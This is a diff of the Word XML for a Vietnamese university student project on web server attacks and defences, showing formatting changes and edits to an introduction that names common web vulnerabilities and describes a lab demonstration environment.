--- a/Hacking_Web_Server_Project.docx
+++ b/Hacking_Web_Server_Project.docx
@@ -446,6 +446,8 @@
           <w:sz w:val="28"/>
         </w:rPr>
         <w:sectPr>
+          <w:footerReference w:type="default" r:id="rId10"/>
+          <w:footerReference w:type="first" r:id="rId11"/>
           <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
           <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1701" w:header="720" w:footer="720" w:gutter="0"/>
           <w:pgBorders w:display="firstPage" w:offsetFrom="page">
@@ -493,25 +495,26 @@
         </w:rPr>
         <w:t>2025</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="28"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>TRƯỜNG ĐẠI HỌC AN GIANG</w:t>
-      </w:r>
+        <w:sectPr>
+          <w:type w:val="continuous"/>
+          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
+          <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1701" w:header="720" w:footer="720" w:gutter="0"/>
+          <w:pgNumType w:start="1"/>
+          <w:cols w:space="720"/>
+          <w:titlePg/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -572,7 +575,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05280DCE" wp14:editId="6CA63A13">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CBEAE15" wp14:editId="4A292C2D">
             <wp:extent cx="1440568" cy="1440568"/>
             <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
             <wp:docPr id="3" name="Picture 3"/>
@@ -622,7 +625,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45410DC6" wp14:editId="6BBA34BA">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28909E4E" wp14:editId="4F15D5A6">
             <wp:extent cx="1647825" cy="1647825"/>
             <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
             <wp:docPr id="6" name="Picture 6"/>
@@ -703,15 +706,7 @@
           <w:bCs/>
           <w:sz w:val="28"/>
         </w:rPr>
-        <w:t>ĐỒ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ÁN</w:t>
+        <w:t>ĐỒ ÁN</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -933,55 +928,39 @@
           <w:sz w:val="28"/>
         </w:rPr>
         <w:br/>
-        <w:t>AN GIANG, THÁNG</w:t>
-      </w:r>
-      <w:r>
+        <w:t>AN GIANG, THÁNG 8 NĂM 2025</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-        </w:rPr>
-        <w:t>8</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-        </w:rPr>
-        <w:t>NĂM 2025</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
+        <w:sectPr>
+          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
+          <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1701" w:header="720" w:footer="720" w:gutter="0"/>
+          <w:pgBorders w:offsetFrom="page">
+            <w:top w:val="single" w:sz="2" w:space="24" w:color="auto"/>
+            <w:left w:val="single" w:sz="2" w:space="24" w:color="auto"/>
+            <w:bottom w:val="single" w:sz="2" w:space="24" w:color="auto"/>
+            <w:right w:val="single" w:sz="2" w:space="24" w:color="auto"/>
+          </w:pgBorders>
+          <w:pgNumType w:start="1"/>
+          <w:cols w:space="720"/>
+          <w:titlePg/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="28"/>
         </w:rPr>
       </w:pPr>
@@ -1514,22 +1493,6 @@
         </w:rPr>
         <w:t>u có)</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4555,369 +4518,17 @@
     </w:sdt>
     <w:p>
       <w:pPr>
-        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
+      <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
+        <w:lastRenderedPageBreak/>
+        <w:br w:type="page"/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4935,13 +4546,14 @@
           <w:sz w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc207641130"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc207641130"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>TỔNG QUAN VỀ</w:t>
       </w:r>
       <w:r>
@@ -4968,7 +4580,7 @@
         </w:rPr>
         <w:t>NG</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="0"/>
+      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4985,7 +4597,7 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc207641131"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc207641131"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4993,7 +4605,7 @@
         </w:rPr>
         <w:t>Giới thiệu</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="1"/>
+      <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5008,7 +4620,13 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t>Trong thời đại số hóa</w:t>
+        <w:t xml:space="preserve">Trong kỷ nguyên số </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>hóa</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5044,7 +4662,25 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> đã trở thành một phần không thể thiếu của các tổ chức, doanh nghiệp, là cầu nối quan trọng để giao tiếp, cung cấp dịch vụ và thực hiện các hoạt động kinh doanh. Vớ</w:t>
+        <w:t xml:space="preserve"> đã trở thành </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nền tảng cốt lõi của mọi tổ chức và doanh nghiệp, hoạt động như một cầu nối quan trọng để cung cấp dịch vụ, chia sẻ thông tin và thực hiện các giao dịch trực tuyến</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Vớ</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5074,13 +4710,115 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> ảnh hưởng đến thông tin cá nhân người dùng về (tài khoản mật khẩu ngân hàng, thông tin doanh nghiệp, bí mật quốc gia,…) và nhiều hậu quả nặng nề khác</w:t>
+        <w:t xml:space="preserve"> ảnh hưởng đến thông tin cá nhân người dùng về (tài khoản mật khẩ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">, thông tin </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">và bí mật kinh doanh của </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>doanh nghiệ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>,…) và nhiều hậu quả nặng nề khác</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:bCs/>
         </w:rPr>
         <w:t>. Mục tiêu của các cuộc tấn công này có thể là đánh cắp thông tin nhạy cảm (như dữ liệu thẻ tín dụng, tài khoản ngân hàng), công bố thông tin mật, hoặc thay đổi giao diện trang web (defacing).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ja-JP"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62C4239F" wp14:editId="40EEBB99">
+            <wp:extent cx="3085213" cy="1682905"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+            <wp:docPr id="9" name="Picture 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="9" name="Gemini_Generated_Image_9jg5m89jg5m89jg5.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3094710" cy="1688085"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Hình 1.1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5108,7 +4846,200 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t>. Đồ án này được xây dựng trên tinh thần đó, với mục tiêu không chỉ phân tích chi tiết các kỹ thuật tấn công phổ biến vào web server mà còn trình bày cách xây dựng môi trường demo thực tế và đưa ra các biện pháp phòng chống hiệu quả, giúp nâng cao nhận thức và trang bị kiến thức cần thiết để bảo vệ hệ thống.</w:t>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:noProof/>
+          <w:lang w:eastAsia="ja-JP"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00D53F19" wp14:editId="6C7F1E4D">
+            <wp:extent cx="2990945" cy="1739631"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="11" name="Picture 11"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="11" name="webseveractack01.jpg"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3029209" cy="1761887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Hình </w:t>
+      </w:r>
+      <w:r>
+        <w:t>1.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">2 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:ind w:left="720" w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Đồ án này được </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">xây dựng với mục tiêu cung cấp một cái nhìn toàn diện về các mối đe dọa này. Chúng tôi không chỉ đi sâu vào việc phân tích các kỹ thuật tấn công phổ biến mà còn tập trung vào khía cạnh thực hành, nhằm giúp người học có thể tự xây dựng và </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">phòng ngừa và </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>bảo vệ hệ thống</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> web server</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Cụ thể hơn, đồ án sẽ phân tích chuyên sâu và làm rõ chi tiết các kỹ thuật tấn công web server phổ biến nhất hiện nay, bao gồm SQL Injection, Cross-Site Scripting (XXS),</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Insecure Direct Object References</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Sensitive data exposure</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> và các lỗ hổng khác như Directory Traversal, File Upload Vulnerability…</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Dự trên cơ sở lý thuyết cũng như các cách thức tấn công web server này chúng tôi thiết lập một môi trường ảo mô phỏng các cuộc tấn công một cách an toàn và hợp pháp có tính tham khảo và nghiên cứu và chia sẻ. Từ đó giúp người học nắm vững các bước tấn công và cách thức khai thác hệ thống.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:ind w:left="720" w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Qua các cơ sở đó, từ lý thuyết đến cách thức hoạt động, xâm nhập tấn công một hệ thống máy chủ web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> đồ án đưa ra các biện pháp cũng như các chiến lược và phòng thủ hiệu quả, bao gồm kỹ thuật lập trình an toàn, cấu hình hệ thống đúng cách và sử dụng các công cụ bảo mật chuyên dụng như Firewalls và IDS/IPS</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5126,7 +5057,7 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc207641132"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc207641132"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -5141,7 +5072,7 @@
         </w:rPr>
         <w:t>, các giai đoạn của một cuộc tấn công, phân loại hacker</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkEnd w:id="3"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5177,7 +5108,7 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc207641133"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc207641133"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -5192,7 +5123,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> và liên quan đến web server</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="3"/>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5316,14 +5247,7 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">bảo mật, sử dụng chính sách mật khẩu yếu … đều là các </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>điểm nhạy cảm có khả</w:t>
+        <w:t>bảo mật, sử dụng chính sách mật khẩu yếu … đều là các điểm nhạy cảm có khả</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5733,6 +5657,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Attack:</w:t>
       </w:r>
       <w:r>
@@ -6039,14 +5964,7 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> là nơi lưu trữ các nội dung của một website, trên cơ sở dữ liệu có thể lưu thông tin về các tài khoản, mật khẩu, email … của người dùng. Hoặc thậm chí là các thông tin cực kỳ quan trọng như </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>thông tin về thẻ thanh toán và hồ sơ y tế. Vậy nên đây là một mục tiêu phổ biến của Hacker.</w:t>
